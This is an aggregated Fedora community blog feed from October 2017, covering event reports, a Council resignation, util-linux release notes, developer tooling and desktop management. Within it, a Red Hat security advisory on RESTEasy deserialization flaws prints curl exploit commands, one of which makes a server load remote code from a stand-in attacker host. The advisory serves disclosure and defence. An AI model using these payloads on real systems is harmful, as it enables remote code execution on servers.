20 Oct 2017

feedFedora People

Wolnei Tomazelli Junior: Thursday 19 oct, was the second day of LatinoWare and temperature go low to 25ºC after a heavy storm...

Thursday 19 oct, was the second day of LatinoWare and temperature go low to 25ºC after a heavy storm. Unfortunately was damaged part of event infrastructure, but happily after a hard work everything back to normal at 1 pm of today.
We have our first FudMeeting at room Venezuela, from 10am to 5pm, with many great talks about Ansible, oVirt, ARM, How start contribute, Packaging and Translation. In result of this day will be one more traducer and website contributor do Fedora Project.
Closest to our room, many children was playing with educational robotics and using Fedora Robotics to upload their code to their ARM board.
Closing the day, employers of ITAIPU offer us a nice pizza dinner and a amazing surprise of live show of rock band. The band play very well many Brazilian rock classics and made all people get up to dance and sing together.

http://latinoware.org/1o-fudmeeting/ #fedora #latinoware #linux


20 Oct 2017 2:15am GMT

19 Oct 2017

feedFedora People

Justin W. Flory: Resigning from Fedora Council for Fedora 27

FAmSCo August 2017 elections: Thoughts on a global community

Since I became a Fedora contributor in August 2015, I've spent a lot of time in the community. One of the great things about a big community like Fedora is that there are several different things to try out. I've always tried to do the most help in Fedora with my contributions. I prefer to make long-term, in-depth contributions than short-term, "quick fix"-style work. However, like many others, Fedora is a project I contribute to in my free time. Over the last month, I've come to a difficult realization.

After deep consideration, I am resigning from the Fedora Council effective at the end of the Fedora 26 release cycle.

Why I'm stepping back

When I decided to run for Fedora Council in July, I had not yet moved back to Rochester, New York. From my past experiences, I didn't predict an issue to fulfill my commitments to the Fedora community. However, since moving back to Rochester, it is difficult to fulfill my expectations, Council and otherwise, to Fedora.

I'm entering the last years of my degree and the rigor of my coursework demands more time and focus. Additionally, I'm working more hours this year than I have in the past, which takes away more time Fedora. Because student loans are too real.

If I expected these changes, I would not have run for the Council. However, from my short time on the Council, I understand the energy and dedication needed to represent the community effectively. During my campaign and term, this was my driving motivation - to do my best to represent an international community of thousands in the highest body of leadership in Fedora. Now, I do not feel I am meeting my standard of participation and engagement. Already, I've stepped back from the Fedora Magazine and Marketing teams to focus more time in other areas of Fedora. Now, it is right to do the same for the Council.

I will spend the most time in the CommOps and Diversity teams, since I believe that is where I can make the largest impact as a contributor.

Fedora 27 Council elections

I privately shared my resignation with the Fedora Council before writing this post. After discussing with other Council members, the plan is

  1. Elect a new, full-term Council member for Fedora 27 and 28
  2. Elect a new, half-term Council member for only Fedora 27

In past elections with half-term seats, the candidate with the most votes receives the full-term seat and the runner-up receives the half-term seat. I expect this to happen again, although final details will come once the election phase begins.

Thank you for your trust

This is one of the most difficult decisions I've made in Fedora. Serving on the Fedora Council is the greatest privilege. My election to the Council by hundreds of people was humbling and inspired me to not only lead by example, but represent the perspective of the greater Fedora community to the Council. This was the greatest honor for me and it disappoints me to finish my term early.

However, based on current circumstances, I believe this is the best path forward to make sure the community is well-represented in Fedora leadership. Thank you for your trust and I hope I can return to serve the community in this capacity someday in the future.

The post Resigning from Fedora Council for Fedora 27 appeared first on Justin W. Flory's Blog.

19 Oct 2017 9:08pm GMT

Fernando Espinoza: Cómo configurar sus dispositivos para la protección de la privacidad.

Las computadoras, los teléfonos inteligentes y los aparatos conectados a Internet han hecho nuestras vidas más fáciles hasta el punto en que estaríamos atrapados sin ellos. Por otro lado, cuanto más confiamos en ellos, más datos pasan a través de ellos y potencialmente fuera de nuestro control. Lamentablemente, estos dispositivos a menudo están mal protegidos por la... Seguir leyendo →

19 Oct 2017 8:03pm GMT

Christian F.K. Schaller: Looking back at Fedora Workstation so far

So I have over the last few years blogged regularly about upcoming features in Fedora Workstation. Well I thought as we putting the finishing touches on Fedora Workstation 27 I should try to look back at everything we have achieved since Fedora Workstation was launched with Fedora 21. The efforts I highlight here are efforts where we have done significant or most development. There are of course a lot of other big changes that has happened over the last few years by the wider community that we leveraged and offer in Fedora Workstation, examples here include things like Meson and Rust. This post is not about those, but that said I do want to write a post just talking about the achievements of the wider community at some point, because they are very important and crucial too. And along the same line this post will not be speaking about the large number of improvements and bugfixes that we contributed to a long list of projects, like to GNOME itself. This blog is about taking stock and taking some pride in what we achieved so far and major hurdles we past on our way to improving the Linux desktop experience.
This blog is also slightly different from my normal format as I will not call out individual developers by name as I usually do, instead I will focus on this being a totality and thus just say 'we'.

I am sure I missed something, but this is at least a decent list of Fedora Workstation highlights for the last few years. Next onto working on my Fedora Workstation 27 blogpost :)

19 Oct 2017 6:35pm GMT

Laura Abbott: Splitting the Ion heaps

One of the requests before Ion moves out of staging is to split the /dev interface into multiple nodes. The way Ion allocation currently works is by calling ioctls on /dev/ion. This certainly works but requires that Ion have a fairly permissive set of privileges. There's not an easy1 way to restrict access to certain heaps. Splitting access out into /dev/ion0, /dev/ion1 etc. makes it possible to set Unix and selinux permissions per heap. Benjamin Gaignard has been working on some proposals to make this work.

I decided to give this a boot and run a few tests. Everything came up okay in my buildroot based environment but I didn't see /dev/ion0, /dev/ion1 on my Android system. Creation of the device nodes is the responsibility of userspace so it wasn't too surprising to see at least some problems. On most systems, this is handled by some subset of udev, which might be part of systemd or some other init subsystem. Android being Android uses its own setup for device initialization.

My preferred Android board these days is a HiKey development board. Linaro has done a fantastic job of getting support for this board in AOSP so I can work off of AOSP master or one of the branches to do development. By default, AOSP ships a binary kernel module based on whatever branch they are shipping but John Stultz keeps a git tree with a branch that tracks mainline pretty closely. With this setup, I can recompile and test almost any part of the system I want (except for the Mali blobs of course).

The Android init system provides an option to log uevents. This was useful for seeing exactly what was going on. The logs showed the init system probing some typical set of the /sys hierarchy. The Ion nodes weren't on that list though, so the Android init system wasn't finding it in /sys. This is what I found in /sys/devices/ on my qemu setup:

# ls /sys/devices/
LNXSYSTM:00  ion0         msr          platform     software     tracepoint
breakpoint   ion1         pci0000:00   pnp0         system       virtual

ion0 and ion1 are present in the /sys hierarchy but not where one might have expected. This was a side-effect of how the underlying devices were set up in the kernel. I'm not very familiar with the device model so I'm hoping to see more feedback on a proper solution. Progress always takes time...

  1. You can do some filtering with seccomp but that's not the focus here.

19 Oct 2017 6:00pm GMT

Karel Zak: util-linux v2.31 -- what's new?

uuidparse -- this is a new small command to get more information about UUIDs "hash". The command provides info about UUID type, variant and time. For example:

$ (uuidgen; uuidgen -t) | uuidparse
8f251893-d33a-40f7-9bb3-36988ec77527 DCE random
66509634-b404-11e7-aa8e-7824af891670 DCE time-based 2017-10-18 15:01:04,751570+0200

The command su has been refactored and extended to create pseudo terminal for the session (new option --pty). The reason is CVE-2016-2779, but the issue addressed by this CVE is pretty old and all the problem is silently ignored for for years on many places (on only su(1)). The core of the problem is that unprivileged user (within su(1) session) shares terminal file descriptor with original root's session. The new option --pty forces su(1) to create independent pseudo terminal for the session and than su(1) works as proxy between the terminals. The feature is experimental and not enabled by default (you have to use su --pty).

standard su session (all on pts/0):

24909 pts/0 S 0:02 \_ -bash
13607 pts/0 S 0:00 \_ su - kzak
13608 pts/0 S 0:00 \_ -bash
13679 pts/0 R+ 0:00 \_ ps af

su --pty session (root pts/0; user pts/5):

24909 pts/0 S 0:02 \_ -bash
13857 pts/0 S+ 0:00 \_ su --pty - kzak
13858 pts/5 Ss 0:00 \_ -bash
13921 pts/5 R+ 0:00 \_ ps af

rfkill -- this is a new command in util-linux. The command was originally written by Johannes Berg and Marcel Holtmann and maintained for years as standalone package. We believe that it's better to maintain and distribute it with another commands on one place. The util-linux version is backwardly compatible with the original implementations. The command has been also improved (libsmartcols ouotput, etc.), the new default output:
# rfkill       
0 bluetooth tpacpi_bluetooth_sw unblocked unblocked
1 wlan phy0 unblocked unblocked
4 bluetooth hci0 blocked unblocked

The library libuuid and command uuidgen support hash-based UUIDs v3 (md5) and v5 (sha1) as specified by RFC-4122 now. The library also provides UUID templates for dns, url, oid, or x500. For example:
$ uuidgen --sha1 --namespace @dns --name foobar.com

and it's expected to use v3 and v5 UUIDs as hierarchy, so you can use this UUID (or arbitrary other UUID) as a namespace:

$ uuidgen --sha1 --namespace e361e3ab-32c6-58c4-8f00-01bee1ad27ec --name mystuff

I can imagine system where for example per-user or per-architecture partition UUIDs are based on this system. For example use UUID specific for the system root as --namespace and username as --name, or so.

wipefs and libblkid have been improved to provide all possible string permutations for a device. It means that wipefs does not return the first detected signature, but it continues and tries another offsets for the signature. This is important for filesystems and partitions tables where the superblock is backuped on multiple places (e.g. GPT) or detectable by multiple independent ways (FATs). This all is possible without a device modification (the old version provides the same, but only in "wipe" mode).

The libfdisk has been extended to use BLKPG ioctls to inform the kernel about changes. This means that cfdisk and fdisk will not force your kernel to reread all of the partition table, but untouched partitions may remain mounted and used by the system. The typical use-case is resizing the last partition on the system disk.

You can use cfdisk to resize a partition. Yep, cool.

The hwclock command now significantly reduces system shutdown times by not reading the RTC before setting it (except when the --update-drift option is used). This also mitigates other potential shutdown and RTC setting problems caused by requiring an RTC read.

19 Oct 2017 1:23pm GMT

Daniel Pocock: FOSDEM 2018 Real-Time Communications Call for Participation

FOSDEM is one of the world's premier meetings of free software developers, with over five thousand people attending each year. FOSDEM 2018 takes place 3-4 February 2018 in Brussels, Belgium.

This email contains information about:

  • Real-Time communications dev-room and lounge,
  • speaking opportunities,
  • volunteering in the dev-room and lounge,
  • related events around FOSDEM, including the XMPP summit,
  • social events (the legendary FOSDEM Beer Night and Saturday night dinners provide endless networking opportunities),
  • the Planet aggregation sites for RTC blogs

Call for participation - Real Time Communications (RTC)

The Real-Time dev-room and Real-Time lounge is about all things involving real-time communication, including: XMPP, SIP, WebRTC, telephony, mobile VoIP, codecs, peer-to-peer, privacy and encryption. The dev-room is a successor to the previous XMPP and telephony dev-rooms. We are looking for speakers for the dev-room and volunteers and participants for the tables in the Real-Time lounge.

The dev-room is only on Sunday, 4 February 2018. The lounge will be present for both days.

To discuss the dev-room and lounge, please join the FSFE-sponsored Free RTC mailing list.

To be kept aware of major developments in Free RTC, without being on the discussion list, please join the Free-RTC Announce list.

Speaking opportunities

Note: if you used FOSDEM Pentabarf before, please use the same account/username

Real-Time Communications dev-room: deadline 23:59 UTC on 30 November. Please use the Pentabarf system to submit a talk proposal for the dev-room. On the "General" tab, please look for the "Track" option and choose "Real Time Communications devroom". Link to talk submission.

Other dev-rooms and lightning talks: some speakers may find their topic is in the scope of more than one dev-room. It is encouraged to apply to more than one dev-room and also consider proposing a lightning talk, but please be kind enough to tell us if you do this by filling out the notes in the form.

You can find the full list of dev-rooms on this page and apply for a lightning talk at https://fosdem.org/submit

Main track: the deadline for main track presentations is 23:59 UTC 3 November. Leading developers in the Real-Time Communications field are encouraged to consider submitting a presentation to the main track.

First-time speaking?

FOSDEM dev-rooms are a welcoming environment for people who have never given a talk before. Please feel free to contact the dev-room administrators personally if you would like to ask any questions about it.

Submission guidelines

The Pentabarf system will ask for many of the essential details. Please remember to re-use your account from previous years if you have one.

In the "Submission notes", please tell us about:

  • the purpose of your talk
  • any other talk applications (dev-rooms, lightning talks, main track)
  • availability constraints and special needs

You can use HTML and links in your bio, abstract and description.

If you maintain a blog, please consider providing us with the URL of a feed with posts tagged for your RTC-related work.

We will be looking for relevance to the conference and dev-room themes, presentations aimed at developers of free and open source software about RTC-related topics.

Please feel free to suggest a duration between 20 minutes and 55 minutes but note that the final decision on talk durations will be made by the dev-room administrators based on the received proposals. As the two previous dev-rooms have been combined into one, we may decide to give shorter slots than in previous years so that more speakers can participate.

Please note FOSDEM aims to record and live-stream all talks. The CC-BY license is used.

Volunteers needed

To make the dev-room and lounge run successfully, we are looking for volunteers:

  • FOSDEM provides video recording equipment and live streaming, volunteers are needed to assist in this
  • organizing one or more restaurant bookings (dependending upon number of participants) for the evening of Saturday, 4 February
  • participation in the Real-Time lounge
  • helping attract sponsorship funds for the dev-room to pay for the Saturday night dinner and any other expenses
  • circulating this Call for Participation (text version) to other mailing lists

Related events - XMPP and RTC summits

The XMPP Standards Foundation (XSF) has traditionally held a summit in the days before FOSDEM. There is discussion about a similar summit taking place on 2 February 2018. XMPP Summit web site - please join the mailing list for details.

Social events and dinners

The traditional FOSDEM beer night occurs on Friday, 2 February.

On Saturday night, there are usually dinners associated with each of the dev-rooms. Most restaurants in Brussels are not so large so these dinners have space constraints and reservations are essential. Please subscribe to the Free-RTC mailing list for further details about the Saturday night dinner options and how you can register for a seat.

Spread the word and discuss

If you know of any mailing lists where this CfP would be relevant, please forward this email (text version). If this dev-room excites you, please blog or microblog about it, especially if you are submitting a talk.

If you regularly blog about RTC topics, please send details about your blog to the planet site administrators:

Planet site Admin contact
All projects Free-RTC Planet (http://planet.freertc.org) contact planet@freertc.org
XMPP Planet Jabber (http://planet.jabber.org) contact ralphm@ik.nu
SIP Planet SIP (http://planet.sip5060.net) contact planet@sip5060.net
SIP (Español) Planet SIP-es (http://planet.sip5060.net/es/) contact planet@sip5060.net

Please also link to the Planet sites from your own blog or web site as this helps everybody in the free real-time communications community.


For any private queries, contact us directly using the address fosdem-rtc-admin@freertc.org and for any other queries please ask on the Free-RTC mailing list.

The dev-room administration team:

19 Oct 2017 8:33am GMT

Fedora Community Blog: Teaching metrics and contributor docs at Flock 2017

The Fedora Community Operations (CommOps) team held an interactive workshop during the annual Fedora contributor conference, Flock. Flock took place from August 29th to September 1st in Cape Cod, Massachusetts. Justin W. Flory and Sachin Kamath represented the team in the workshop. CommOps spends a lot of time working with metrics and data tools available in Fedora, like fedmsg and datagrepper. Our workshop introduced some of the tools to work with metrics in Fedora and how to use them. With our leftover time, we discussed the role of contributor-focused documentation in the wiki and moving it to a more static place in Fedora documentation.

What does CommOps do?

The beginning of the session introduced the CommOps team and explained our function in the Fedora community. There's two different skill areas in the CommOps team: one focuses on data analysis and the other focuses on non-technical community work. The motivation for CommOps was explained too. The team's mission is to bring more heat and light into the project, where light is exposure and awareness, and heat is more activity and contributions. Our work usually follows this mission for either technical or non-technical tasks.

At the beginning of the workshop, metrics were the main discussion point. CommOps helps generate metrics and statistical reports about activity in Fedora. We wanted to talk more about the technical tools we use and how others in the workshop could use them for their own projects in Fedora.

What are Fedora metrics?

fedmsg is the foundation for all metrics in Fedora. fedmsg is a message bus that connects the different applications in Fedora together. All applications and tools used by Fedora contributors emit messages into fedmsg. This includes git commits, Koji build status, Ansible playbook runs, adding a member to a FAS group, new translations, and more. Together, the data is meaningless and is difficult to understand. In the #fedora-fedmsg channel on Freenode, you can see all the fedmsg activities in the project (you can see the project "living"!). The valuable part is when you take the data and filter it down into something meaningful.

One of the examples from the workshop was the analysis of FOSDEM and community engagement by CommOps contributor Bee Padalkar. In her report, she determined our approximate impact in the community at FOSDEM. Using Fedora Badges, it revealed how many people we interacted with at FOSDEM and how they engaged with the Fedora community before and after the conference.

The metrics tools in Fedora help make this research possible. One of the primary goals of our workshop was to introduce the metrics tools and how to use them for the audience. We hoped to empower people to build and generate metrics of their own. We also talked about some of the plans by the team to advance use of metrics further.

Introducing the CommOps toolbox

The CommOps toolbox is a valuable resource for the data side of CommOps. Our virtual toolbox is a list of all the metrics and data tools available for use and a short description of how they're used. You can see the toolbox on the wiki.

Sachin led this part of the workshop and explained some of the most common tools. He introduced what a fedmsg publication looked like and helped explain the structure of the data. Next, he introduced Datagrepper. Datagrepper helps you pull fedmsg data based on a set of filters. With your own filters, you can customize the data you see to make comparisons easier. Complex queries with Datagrepper are powerful and help bring insights into various parts of the project. When used effectively, it provides insight into potential weak spots in a Fedora-related project.

Finally, Sachin also introduced his Google Summer of Code (GSoC) 2016 project, gsoc-stats. gsoc-stats is a special set of pre-defined filters to create contribution profiles for individual contributors. It breaks down where a contributor spends most of their time in the project and what type of work they do. Part of its use was for GSoC student activity measurements, but it has other uses as well.

What is Grimoire Lab?

Sachin is leading progress on a new tool for CommOps called Grimoire Lab. Grimoire Labs is a visual dashboard tool that lets a user create charts, graphs, and visual measurements from a common data source. The vision for Grimoire Lab in Fedora is to build an interactive dashboard based off of fedmsg data. Using the data, anyone could create different gauges and measurements in an easy-to-understand chart or graph. This helps make the fedmsg data more accessible for others in the project to use, without making them write their own code to create graphic measurements.

Most of the time for Grimoire Lab in the workshop was explaining its purpose and expected use. Sachin explained some of the progress made so far to make the tool available in Fedora. This goal is to get it hosted inside of Fedora's infrastructure next. We hope to deliver on an early preview of this over the next year.

Changing the way we write contributor documentation

The end of our workshop focused on non-technical tasks. We had a few tickets highlighted but left it open to the audience interest to direct the discussion. One of the attendees, Brian Exelbierd, started a discussion about the Fedora Documentation team and some of the changes they've made over the last year. Brian introduced AsciiDoc and broke down the workflow that the Docs team uses with the new tooling. After explaining it, the idea came up of hosting contributor-focused information in a Fedora Docs-style project, instead of the wiki.

The two strong benefits of this approach is to keep valuable information updated and to make it easily accessible. Some common wiki pages for the CommOps team came up, like the pages explaining how to join the team and how to get "bootstrapped" in Fedora. After Brian's explanation of the tools, the new Docs tool chain felt easy to keep up and effective promoting high-value content for contributors out of the wiki. Later during Flock, on Thursday evening, Brian organized a mini workshop to extend this idea further and teach attendees how to port content over.

CommOps hopes to be an early example of a team to use this style of documentation for our contributor-focused content. Once we are comfortable with the set-up and have something to show to others, we want to document how we did and explain how other teams can do it too. We hope to carry this out over the Fedora 27 release cycle.

See you next year!

Flock 2017 was a conference full of energy and excitement. The three-hour workshop was useful and effective for CommOps team members to meet and work out plans for the next few release cycles in the same room. In addition to our own workshop, spending time in other workshops was also valuable for our team members to see what others in Fedora are doing and where they need help.

A special thanks goes out to all the organizing staff, for both the bid process and during the conference. Your hard work helps drive our community forward every year by feeling more like a community of people, in an open source world where we mostly interact and work together over text messaging clients and emails.

We hope to see you next year to show you what we accomplished since last Flock!

The post Teaching metrics and contributor docs at Flock 2017 appeared first on Fedora Community Blog.

19 Oct 2017 8:30am GMT

Wolnei Tomazelli Junior: Today, Wednesday 18 oct, was the first day of LatinoWare fourteen edition hosted in the city of Foz ...

Today, Wednesday 18 oct, was the first day of LatinoWare fourteen edition hosted in the city of Foz do Iguaçu in Parana state with presence of 4552 participants and temperature of 37ºC. Currently this is the biggest event of free software in Brazil.
Early morning we took Latinoware bus to Itaipu Technological Park. We set up the Fedora Project stand with banner and five type of stickers for the winners of a traditional quiz. All the ambassadors present in our stand, catch from imagination a question about Fedora to ask participants.
Between our quick quiz, many persons came by our stand to ask some question about use Fedora or how contribute in some our projects, today indicate one more person to start contribute in Translation team.
At the end of morning, 11am on room Peru, Daniel Lara gave his first talk about Virtualization to users, where try convince people to use KVM instead of VirtualBox. In lunch hour, 12pm on room Brazil, Dennis Gilmore gave his first talk about What Open Source can do for you and to World, where demonstrated his experience in develop with free software for more than twenty years.
In the rest of my afternoon helped a Fedora 64-bit Workstation installation on a notebook and demonstrated KDE interface to a indecisive user.

#fedora #latinoware #linux #FozIguacu


19 Oct 2017 12:10am GMT

18 Oct 2017

feedFedora People

Adam Young: Deliberate Elevation of Privileges

"Ooops." - Me, doing something as admin that I didn't mean to do.

While the sudo mechanism has some warranted criticism, it is still an improvement on doing everything as the root account. The essential addition that sudo provides for the average sys admin is the ability to only grant themselves system admin when they explicitly want it.

I was recently thinking about a FreeIPA based cluster where the users did not realize that they could get admin permissions by adding themselves to the user group admins. One Benefit to the centralized admin account is that a user has to chose to operate as admin to perform the operation. If a hacker gets the users password, they do not get admin. However, the number of attacks and weaknesses in this approach far outweigh the benefits. Multiple people need to know the password, revoking it for one revokes it for everyone, anyone can change the password, locking everyone else out, and so on.

We instead added a few key individuals to the admins group and changed the password on the admin account.

This heightened degree of security supports the audit trail. Now if someone performs and admin operation, we know which user did it. It involves enabling audit on the Directory Server (I need to learn how to do this!).

It got me thinking, though, if there was a mechanism like the sudo approach that we could implement for users to temporarily elevate them to admins status. Something like a short term group membership. The requirements, as I can see are these:

  1. A user has to chose to be admin: "admin-powers activate!"
  2. A user can downgrade back to non-admin at any point: "admin-powers activate!"
  3. Admin powers wear off. admin-powers only last an hour
  4. No new password has to be memorized for admin-powers
  5. The mechanism for admin-powers has to be resistant to attack.
    1. customizable enough that someone outside the organization can't guess what they are.
    2. provide some way to prevent shoulder surfing.

I'm going to provide a straw-man here.

As I said, a strawman, but I think it points in the right direction. Thoughts?

18 Oct 2017 7:31pm GMT

Subhendu Ghosh: Understanding RapidJson – Part 2

In my previous blog on Rapidjson, alot of people asked for a detailed example in the comments so here is part 2 of Understanding Rapidjson with a slightly detailed example. I hope this will help you all.

We will straightaway improve on my last example in the previous blog and modify the changeDom function to add more complex object to the DOM tree.

template <typename Document>
void changeDom(Document& d){
Value& node = d["hello"];
Document subdoc(&d.GetAllocator());
subdoc.SetObject(); // starting the object
Value arr(kArrayType); // the innermost array
 Value::AllocatorType allocator;
for (unsigned i = 0; i < 10; i++)
arr.PushBack(i, allocator); // adding values to array , this function expects an allocator object
// adding the array to its parent object and so on , finally adding it to the parent doc object
subdoc.AddMember("New", Value(kObjectType).Move().AddMember("Numbers",arr, allocator), subdoc.GetAllocator());
d.AddMember("testing",subdoc, d.GetAllocator()); // finally adding the sub document to the main doc object
d["f"] = true;

Here we are creating Value objects of type kArrayType and kObjectType and appending them to their parent node from innermost to outermost.

Before Manupulation
 "hello": "world",
 "t": true,
 "f": false,
 "n": null,
 "i": 123,
 "pi": 3.1416,
 "a": [
After Manupulation
 "hello": "c++",
 "t": false,
 "f": true,
 "n": null,
 "i": 123,
 "pi": 3.1416,
 "a": [
 "testing": {
     "New": {
         "Numbers": [

The above changeDom can also be written using prettywritter object as follows:

template <typename Document>
void changeDom(Document& d){
Value& node = d["hello"];
Document subdoc(&d.GetAllocator()); // sub-document
// old school write the json element by element
StringBuffer s;
PrettyWriter<StringBuffer> writer(s);
for (unsigned i = 0; i < 10; i++)
subdoc.Parse(s.GetString()); // Parsing the string written to buffer to form a sub DOM

d.AddMember("testing",subdoc, d.GetAllocator()); // Attaching the Sub DOM to the Main DOM object
d["f"] = true;

Happy Coding! Cheers.

More reads:

18 Oct 2017 2:38pm GMT

Red Hat Security: Abuse of RESTEasy Default Providers in JBoss EAP

Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for Restful webservices. A powerful but potentially dangerous feature of Restful webservices on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process the request with the default provider matching the Content-Type HTTP Header which the client specifies. Some of the default providers where found to have vulnerabilities which have now been removed from JBoss EAP and it's upstream Restful webservice project, RESTEasy.

The attack vector

There are two important vulnerabilities fixed in the RESTEasy project in 2016 which utilized default providers as an attack vector. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing the following:

  • @Consumes annotation was present specifying wildcard mediaType {*/*}
  • @Consumes annotation was not present on webservice endpoint
  • Webservice endpoint consumes a multipart mediaType

Here's an example of what a vulnerable webservice would look like:

import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

public class PoC_resource {

        public Map<String, String> doConcat(Pair pair) {
                HashMap<String, String> result = new HashMap<String, String>();
                result.put("Result", pair.getP1() + pair.getP2());
                return result;


Notice how there is no @Consumes annotation on the doConcat method.

The vulnerabilities

CVE-2016-7050 took advantage of the deserialization capabilities of SerializableProvider. It was fixed upstream1 before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. It was reported to Red Hat by Mikhail Egorov of Odin.

If a Restful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending a HTTP Request with a Content-Type of application/x-java-serialized-object. The body of that request would be processed by the SerializationProvider and could contain a malicious payload generated with ysoserial2 or similar. A remote code execution on the server could occur as long as there was a gadget chain on the classpath of the web service application.

Here's an example:

curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'

CVE-2016-9606 also exploited the default providers of Resteasy. This time it was the YamlProvider which was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget chain library on the classpath. Instead, the Snakeyaml library from Resteasy was being exploited directly to allow remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.

SnakeYaml allows loading classes with a URLClassloader, using it's ScriptEngineManager feature. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading that Java code and executing it.

An example of a malicious request is as follows:

curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat

Where evilserver.com is a host controlled by the malicious actor

Again, you can see the use of Content-Type, HTTP Header, which tricks RESTEasy into using YamlProvider, even though the developer didn't intend for it to be accessible.

How to stay safe

The latest versions of EAP 6.4.x, and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but we found it was possible to exploit on 7.1 and is now fixed in the 7.1.0.Beta release. CVE-2016-7050 didn't affect either of EAP 6.4.x, or 7.0.x.

If you're using an unpatched release of upstream RESTEasy, be sure to specify the mediaType you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:

import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

public class PoC_resource {

        public Map<String, String> doConcat(Pair pair) {
                HashMap<String, String> result = new HashMap<String, String>();
                result.put("Result", pair.getP1() + pair.getP2());
                return result;


Notice this safe version added a @Consumes annotation with a mediaType of application/json

This is good practice anyway, because if a HTTP client tries to send a request with a different Content-Type HTTP Header the application will give an appropriate error response, indicating that the Content-Type is not supported.

  1. https://issues.jboss.org/browse/RESTEASY-1269

  2. https://github.com/frohoff/ysoserial


Red Hat JBoss Enterprise Application Platform




jaxrs webservices

18 Oct 2017 1:30pm GMT

Christian F.K. Schaller: Fleet Commander ready for takeoff!

Alberto Ruiz just announced Fleet Commander as production ready! Fleet Commander is our new tool for managing large deployments of Fedora Workstation and RHEL desktop systems. So get our to Albertos Fleet Commander blog post for all the details.

18 Oct 2017 12:01pm GMT

Alberto Ruiz: Fleet Commander: production ready!

It's been awhile since I last wrote any updates about Fleet Commander, that's not to say that there hasn't been any progress since 0.8. In many senses we (Oliver and I) feel like we should present Fleet Commander as a shiny new project now as many changes have gone through and this is the first release we feel is robust enough to call it production ready.

What is Fleet Commander?

For those missing some background, let me introduce Fleet Commander for you, Fleet Commander is an integrated solution for large Linux desktop deployments that provides a configuration management interface that is controlled centrally and that covers desktop, applications and network configuration. For people familiar with Group Policy Objects in Active Directory in Windows, it is very similar.

Many people ask why not use other popular Linux configuration management tools like Ansible or Puppet, the answer is simple, those are designed for servers that run in a controlled environment like a data center or the cloud, it follows a push model where the configuration changes happen as a series of commands run in the server. If something goes wrong it is easy to audit and rollback if you have access to that server. However desktop machines in large corporate environments can run many times behind a NAT on a public WiFi, think a laptop owned by an on-site support engineer that roams from site to site. Fleet Commander pulls a bunch of configuration data and makes it available to apps without running intrusive shell scripts or walking in into users' $HOME directory. Ansible and puppet did not solve the core problems of desktop session configuration management so we had to create something new.

At Red Hat we talk to many enterprise desktop customers with a mixed environment of Windows, Macs and Linux desktops and our interaction with them has helped us identify this gap in the GNOME ecosystem and motivated us to roll up our sleeves and try to come up with an answer.

How to build a profile

The way Fleet Commander works when building profiles is somewhat interesting compared to its competitors. We've inspired our solution on the good old Sabayon tool. On our admin web UI you get a VM desktop session where you run and configure your apps, Fleet Commander will record those changes and list them. The user will select them and the final selection will get bound together as part of the profile.

You can then apply the profile to individual users, groups, hosts or host groups.


Supported apps/settings

Right now we support anything dconf based (GSettings), GNOME Online Accounts, LibreOffice and NetworkManager. In the near future we plan to tackle our main problem which is giving support to browsers, we're probably going to start just with bookmarks as it is the most demanded use case.

Cockpit integration


The Fleet Commander UI runs on top of the Cockpit admin UI. Cockpit has given us a lot of stuff for free (a basic UI framework, a web service, built-in websocket support for our SPICE javascript client, among many other things).

FreeIPA Integration

A desktop configuration management solution has to be tightly tied to an identity management solution, (like in Active Directory), FreeIPA is the best Free Software corporate identity management project out there and integrating with it allowed us to remove quite a bit of complexity from our code base while improving security. FreeIPA now stores the profile data and the assignments to users, groups and hosts.


SSSD is the client daemon that enrolls and authenticates a Linux machine in a FreeIPA or Active Directory domain, having fleet commander hooking into it was a perfect fit for us and also allowed us to remove a bunch of code from previous versions while having a much more robust implementation. SSSD now retrieves and stores the profile data from FreeIPA.


Our new website is live! We have updated introduction materials and documentation and jimmac has put together a great design and layout. Check it out!
I'd like to thank Alexander Bokovoy and Fabiano Fidencio for their invaluable help extending FreeIPA and SSSD to integrate with Fleet Commander and Jakub for his help on the website design. If you want to know more, join us on our IRC channel (#fleet-commander @ freenode) and our GitHub project page.

It is currently available in Fedora 26 and we are in the process of releasing EPEL packages for CentOS/RHEL.

18 Oct 2017 11:56am GMT

Javier Martinez Canillas: Automatic LUKS volumes unlocking using a TPM2 chip

I joined Red Hat a few months ago, and have been working on improving the Trusted Platform Module 2.0 (TPM2) tooling, towards having a better TPM2 support for Fedora on UEFI systems.

For brevity I won't explain in this post what TPMs are and their features, but assume that readers are already familiar with trusted computing in general. Instead, I'll explain what we have been working on, the approach used and what you might expect on Fedora soon.

For an introduction to TPM, I recommend Matthew Garret's excellent posts about the topic, Philip Tricca's presentation about TPM2 and the official Trusted Computing Group (TCG) specifications. I also found "A Practical Guide to TPM 2.0" book to be much easier to digest than the official TCG documentation. The book is an open access one, which means that's freely available.

LUKS volumes unlocking using a TPM2 device

Encryption of data at rest is a key component of security. LUKS provides the ability to encrypt Linux volumes, including both data volumes and the root volume containing the OS. The OS can provide the crypto keys for data volumes, but something has to provide the key for the root volume to allow the system to boot.

The most common way to provide the crypto key to unlock a LUKS volume, is to have a user type in a LUKS pass-phase during boot. This works well for laptop and desktop systems, but is not well suited for servers or virtual machines since is an obstacle for automation.

